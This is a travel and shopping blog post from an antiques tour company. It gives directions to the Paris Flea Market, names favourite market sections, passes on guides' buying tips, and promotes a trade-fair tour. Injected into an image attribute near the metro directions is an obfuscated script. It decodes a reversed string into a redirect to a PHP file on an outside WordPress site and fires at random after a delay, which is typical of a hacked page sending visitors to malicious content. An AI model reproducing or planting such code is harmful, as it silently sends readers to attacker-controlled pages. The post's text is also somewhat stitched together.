I receive emails from blog readers saying… “I went to the Paris Flea Market… But all I saw was a shabby little market with t-shirt vendors, and suitcases, stolen watches and designer fakes!! What did I do wrong? Where is the Paris Flea Market of my dreams?! The one you see in all the magazines!!”

It is always difficult trying to navigate a foreign city, but Les Puces can be tricky to find.

As the only official tour guides of Paris Flea Market Paul Bert Serpette, here are The Antiques Diva’s tips on how to find the Paris Flea Market.

How to Find the Paris Flea Market

First off – the area surrounding the Puce is always a surprise! It’s located in what I call “the armpit of Paris”—the northernmost area of the city near the Porte de Clignancourt.  This is the type of neighborhood that makes you want to watch your wallet and hold your purse close! It’s a pick-pocket’s haven so BE CAUTIOUS. My go-to technique when meandering in an area is to wear dark shades and avoid eye contact with the humanity. Oh and yes, when I pop out of the flea market the first thing I always think is… “Oh the Humanity!”   Don’t let this dissuade you – you just need to push past the populous.

Paris Metro, Line 4, How <script data-recalc-dims=$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to get to Paris Flea Market, Puce, Clignancourt” width=”600″ height=”330″ />

To get to the flea market, take the metro line 4 from anywhere in the city to the end of the line and get off at the stop Porte de Clignancourt. There will be signs that point to Puces de Paris in the metro station so go ahead and follow those. When you come up to the street exit, you’ll see on the opposite side of the road a small market set up—the kind that sells sunglasses, fake designer bags, t-shirts and even stolen cell phones. Don’t be fooled—this is NOT Les Puces! Most people go wrong at this point and give up, thinking that the Paris flea market of their dreams doesn’t exist.

What you need to do at this point is walk down Avenue Michelet and go past the overpass which is the highway periferique (it circles Paris). Turn left when you see Rue des Rosiers. Once you’ve arrived at the corner of these two streets. you’ve officially made it to the Paris Flea Market! When you get there, you’ll find 15 miles of antique filled alleyways, so it can be a bit overwhelming. Where do you go? What sections specialize in what styles? How do you get your purchases home? That’s where we come in. Our Diva Guides will take you to the best spots in this vast flea market, all the while translating and negotiating on your behalf. They’ll even help liaise you with your preferred shipper.

If you happen to be going on your own, however, I’ll give you my three favorite areas of Les Puces. The first is Marche Vernaison which will be on the right as you enter Les Puces. This market has smalls and perfectly packables which are attractively priced. You can find good jewelry, small paintings, hotel silver, porcelain, and other tabletop items.  The second area I love is Marche Paul Bert which is best described as the Paris flea market you’ve always dreamed of shopping!   It’s what you see in photos when you google Les Puces and it is where the magic happens. A mix of furniture, decorative antiques, industrial items and much more is all set up in proper shops rather than tents. It’s styled and romantic—just what you imagine Paris to be.  Lastly, be sure to visit Marche Serpette which is connected to Paul Bert as the covered section of the market  and perfect should a rainy day make you need to run inside for shelter!

Of course there are many reasons for this— the beautiful architecture, the romance, the food, the history, and, of course, the antiques! From Les Puce to other smaller flea markets that are held throughout the year, Paris offers an extremely vast inventory of antique and vintage pieces. With so many options to choose from, it can be a daunting task to know what to buy (albeit a daunting task I’d gladly take up any day of the week!!!). That’s where my Diva Guides and I come in! I’ve asked each of our Paris Diva Guides to share their top picks for the best finds in Paris Flea Markets.

Diva Guides Best Finds at Paris Flea Markets

Best Finds at Paris Flea Markets: Danielle Diva Guide, The Antiques Diva & Co, Diva Guides, Paris Flea Markets, Favorite finds in Paris flea market, Paris Puce, Flea Market Tours, Buying antiques in Paris, Toma Clark Haines, Buying Tour of Paris Flea Market

Danielle says that anything Art Nouveau is a great find at the Paris Flea Market. She often spots crystal and glass pieces including Baccarat, and porcelain Saint-Louis dining sets. She also says that classic French 18th and 19th-century furniture is a great buy right now as prices are very low. But she warns that while there are some stunning French mid-century modern pieces available, be prepared to pay a bit more money for them.

Best Finds at Paris Flea Markets: Debbie Gabriel, The Antiques Diva & Co, Diva Guides, Paris Flea Markets, Favorite finds in Paris flea market, Paris Puce, Flea Market Tours, Buying antiques in Paris, Toma Clark Haines, Buying Tour of Paris Flea Market

Diva Guide Debbie advises that if you’re looking for items you can pack and take home with you, artwork and linens are smart things to shop for. If you’re planning to ship a container overseas, armoires are a steal right now. Often times the bigger the piece, the better the price so keep that in mind. She also says that Paris flea markets offer beautiful lighting options.

Best Finds at Paris Flea Markets: Jennifer Diva Guide, The Antiques Diva & Co, Diva Guides, Paris Flea Markets, Favorite finds in Paris flea market, Paris Puce, Flea Market Tours, Buying antiques in Paris, Toma Clark Haines, Buying Tour of Paris Flea Market

As a lover of vintage Chanel and high-fashion brands, Diva Guide Jennifer is always finding the best vintage Chanel jewelry and little French pieces that can be made into jewelry. She also comes across vintage Louis Vuitton trunks and vintage Hermès scarves. Beyond vintage fashion, Jennifer also suggests keeping an eye out for Pastis water pitchers, antique seltzer bottles (what a perfect piece for the home bar!), vintage fabrics and vintage posters or prints.

Best Finds at Paris Flea Markets: Katie Phillips, The Antiques Diva & Co, Diva Guides, Paris Flea Markets, Favorite finds in Paris flea market, Paris Puce, Flea Market Tours, Buying antiques in Paris, Toma Clark Haines, Buying Tour of Paris Flea Market

Dive Guide Katie thinks that the best thing about the Paris flea market is that it is just so eclectic and you can find absolutely everything there. She also says that meeting specialists and people so incredibly passionate about what they’re selling is a huge benefit of shopping Paris flea markets.

As for me, I think the best Paris flea market finds are crystal-laden chandeliers. Bedside tables, Taxidermy & Horns, Vintage postcards, gorgeous French linens, not to forget canapés, fauteuils and seats of all shapes and styles!

Dear Diva Readers,

Paris Antiques Trade Fair, Buying antiques in Paris, The Antiques Diva Paris Tours, Cipolat,

It’s common knowledge that the best prices in antiques tend to be in off the beaten path places –  in addition to shopping the antique warehouses in the countryside there are great antique trade fairs in Avignon, Bezier, Montpellier, Chartres and Lyon.  But I’ve got great news – our friends at Cipolat who host those gorgeous antique trade fairs in Lyon and Montepellier are bringing the antiques trade fair out of the countryside and into Paris, making it easier than ever before to do wholesale antique shopping in the city of light.

Paris Antique Trade Fair, Paris Antiques Trade Fair, Buying antiques in Paris, The Antiques Diva Paris Tours, Cipolat,

Join The Antiques Diva & Co for our inaugural tour of this special trade fair October 28, 2014 by emailing  to:info@antiquesdiva.com”>info@antiquesdiva.com for reserving your tour!

  • And the buyers? More than 54 nationalities will be shopping the fair!
  • There are more than 500 vendors offering wholesale antique prices in Paris

How the tour works?

  • We’ll pick you up at your hotel and drive you to the suburbs where the fair takes place.
  • At the trade fair we’ll  translate, negotiate and liaise you with a shipper to help you get your goods home sweet home across the pond.

And if one day on tour is good – I must tell you a 3 or 4 day would be even better.  Consider booking  a multi-day tour to stock your store visiting the Paris Flea Market and then go beyond into French countryside in both the North and South of France as well as Southern England and Belgium.
